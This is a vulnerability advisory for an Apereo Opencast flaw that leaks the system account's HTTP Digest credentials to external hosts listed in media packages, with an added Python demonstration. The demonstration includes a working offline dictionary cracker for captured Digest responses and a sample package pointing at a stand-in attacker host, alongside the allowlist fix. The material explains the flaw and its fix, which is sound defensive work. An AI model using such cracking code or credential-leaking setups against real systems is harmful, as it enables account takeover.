PT-2021-8817 · Apereo · Apereo Opencast

Gregorydlogan · Published 2021-12-14 · Updated 2023-12-14 · CVE-2018-16153

CVSS v3.1 7.5 High
Vector AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Name of the Vulnerable Software and Affected Versions Apereo Opencast versions 4.x through 10.x before 10.6
Description An issue was discovered in Apereo Opencast: in some situations it sends the system account's HTTP Digest credentials to arbitrary external services during authentication attempts. When Opencast processes a media package, it attempts to authenticate against every service URL listed in that package and presents the global system user's digest credentials, without checking whether the target host is part of the Opencast cluster. Earlier mitigations stopped these requests from carrying clear-text credentials, but the Digest response is still a hash derived from the password, and whoever operates the receiving server obtains it, can choose the nonce, and can attack it offline with enough effort.
Recommendations For Apereo Opencast versions 4.x through 10.x before 10.6, update to version 10.6, which only sends authentication requests to servers that are registered as part of the Opencast cluster, so an external service no longer receives any form of authentication attempt. No workaround or additional mitigation for the affected versions is documented at this time.
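The following added example is not Opencast code; it models the two halves of the description above: first why a leaked HTTP Digest response is still dangerous (the attacker-controlled server picks the nonce and can brute-force the response offline), then the host-allowlist decision that the 10.6 fix introduces before credentials are attached. The media package XML, the cluster host list, the user name, realm, nonce, password and wordlist are all constructed for this example and simplified relative to Opencast's real formats.

```python
"""Added example (not Opencast's own code): offline attack on a captured
HTTP Digest response, and the cluster-host check that stops the leak."""
import hashlib
import xml.etree.ElementTree as ET
from urllib.parse import urlparse


def digest_response(user, realm, password, method, uri, nonce):
    """RFC 7616 MD5 Digest without qop: MD5(HA1 ':' nonce ':' HA2)."""
    ha1 = hashlib.md5(f"{user}:{realm}:{password}".encode()).hexdigest()
    ha2 = hashlib.md5(f"{method}:{uri}".encode()).hexdigest()
    return hashlib.md5(f"{ha1}:{nonce}:{ha2}".encode()).hexdigest()


def crack_digest(captured, user, realm, method, uri, nonce, wordlist):
    """Dictionary attack over a captured Digest response.

    Everything except the password is known to the receiving server (it chose
    the nonce and saw the method/URI), so each guess is one MD5 chain offline.
    Returns the recovered password or None.
    """
    for candidate in wordlist:
        if digest_response(user, realm, candidate, method, uri, nonce) == captured:
            return candidate
    return None


# Constructed, simplified media package: one track on a cluster host and one
# on a host the attacker controls (e.g. injected through an ingested package).
MEDIAPACKAGE_XML = """<mediapackage id="constructed-mp">
  <media>
    <track id="track-1"><url>http://opencast.example.org:8080/static/mp/track-1.mp4</url></track>
    <track id="track-2"><url>http://attacker.example.net/capture/track-2.mp4</url></track>
  </media>
</mediapackage>"""

# Constructed stand-in for the service registry's list of cluster hosts.
CLUSTER_HOSTS = {"http://opencast.example.org:8080", "http://worker1.example.org:8080"}


def origin(url):
    """Normalise a URL to scheme://host[:port] for comparison with the registry."""
    p = urlparse(url)
    return f"{p.scheme.lower()}://{p.netloc.lower()}"


def track_urls(mediapackage_xml):
    root = ET.fromstring(mediapackage_xml)
    return [el.text.strip() for el in root.iter("url") if el.text]


def hosts_receiving_credentials(mediapackage_xml, cluster_hosts, fixed):
    """Origins that would be sent the system account's Digest response.

    fixed=False models the pre-10.6 behaviour: authenticate against whatever
    the media package lists.  fixed=True models 10.6: only registered cluster
    hosts are eligible; everything else gets no authentication attempt at all.
    """
    urls = track_urls(mediapackage_xml)
    if not fixed:
        return sorted({origin(u) for u in urls})
    return sorted({origin(u) for u in urls if origin(u) in cluster_hosts})


def simulate_leak():
    """Pre-10.6 flow: the attacker's host answers 401, Opencast replies with a
    Digest Authorization header, the attacker cracks it offline.  Constructed
    values throughout."""
    user, realm, method = "system-account", "Opencast", "GET"
    uri, nonce = "/capture/track-2.mp4", "attacker-chosen-nonce-0001"
    real_password = "correct horse"  # constructed
    captured = digest_response(user, realm, real_password, method, uri, nonce)
    wordlist = ["password", "CHANGE_ME", "opencast", "correct horse"]  # constructed
    return crack_digest(captured, user, realm, method, uri, nonce, wordlist)


if __name__ == "__main__":
    print("vulnerable:", hosts_receiving_credentials(MEDIAPACKAGE_XML, CLUSTER_HOSTS, fixed=False))
    print("fixed:     ", hosts_receiving_credentials(MEDIAPACKAGE_XML, CLUSTER_HOSTS, fixed=True))
    print("recovered password:", simulate_leak())
```

The allowlist compares the full origin (scheme, host and port) rather than just the host name, so a registered host on a different port or scheme is still treated as foreign; that is a deliberate choice for this example, not a description of Opencast's exact matching rule.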

Fix
Information Disclosure
Weakness Enumeration Insufficiently Protected Credentials
Related Identifiers CVE-2018-16153, GHSA-HCXX-MP6G-6GR9
Affected Products Apereo Opencast